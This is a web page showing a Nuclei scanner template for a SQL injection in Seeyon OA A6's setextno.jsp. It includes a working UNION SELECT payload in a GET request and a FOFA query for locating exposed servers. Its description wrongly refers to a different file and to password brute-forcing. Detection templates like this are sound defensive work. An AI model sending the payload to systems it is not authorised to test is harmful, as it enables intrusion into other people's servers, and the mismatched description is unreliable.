Skip to content

Seeyon OA A6 setextno.jsp - SQL Injection

ID: seeyon-oa-setextno-sqli

Severity: high

Author: SleepingBag945

Tags: seeyon,oa,sqli

Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information,You can blast the user password through the obtained username to enter the background for further attacks

id: seeyon-oa-setextno-sqli
info:
name: Seeyon OA A6 setextno.jsp - SQL Injection
author: SleepingBag945
severity: high
description: |
Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information,You can blast the user password through the obtained username to enter the background for further attacks
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20A6%20setextno.jsp%20SQL注入漏洞.html
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20setextno.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: body="yyoa" && app="致远互联-OA"
tags: seeyon,oa,sqli
variables:
num: "999999999"
http:
- raw:
- |
GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5({{num}})),4# HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# digest: 490a004630440220228c7330c15dde92c7e3142d5d9d97d07ed536d2a6822cab610e3c70df2ac0be0220360faa60fed695b1d072144d5226b748fafb55a3d3c3e22ebebdb9698bce5104:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml"

View on Github